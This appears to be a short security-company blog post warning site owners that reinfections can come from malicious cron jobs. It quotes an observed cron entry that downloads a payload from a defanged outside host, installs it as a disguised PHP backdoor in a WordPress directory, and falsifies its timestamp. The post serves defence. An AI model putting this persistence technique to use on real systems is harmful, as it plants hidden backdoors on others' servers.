Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

You may remove malware from files and a database, close all security holes, change all passwords, but your site still gets reinfected regularly. It may be because you forgot to clean your crontab.

Here's an example of a malicious cron job that creates a backdoor file in the /wp-includes/Text/Diff/Engine directory every other day:


DOWNLOAD_URL="hxxp://cpanel .jawebsolutions .com/u/w.gz"
LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"
1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && \
gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 \
$LOCAL_FILE_PATH && rm -f /var/tmp/w.gz

So don't forget to check cron jobs in your hosting control panel or use the crontab -l command if you have SSH access.

Have any comments about this post? Please Message us on Twitter at @sucurilabs.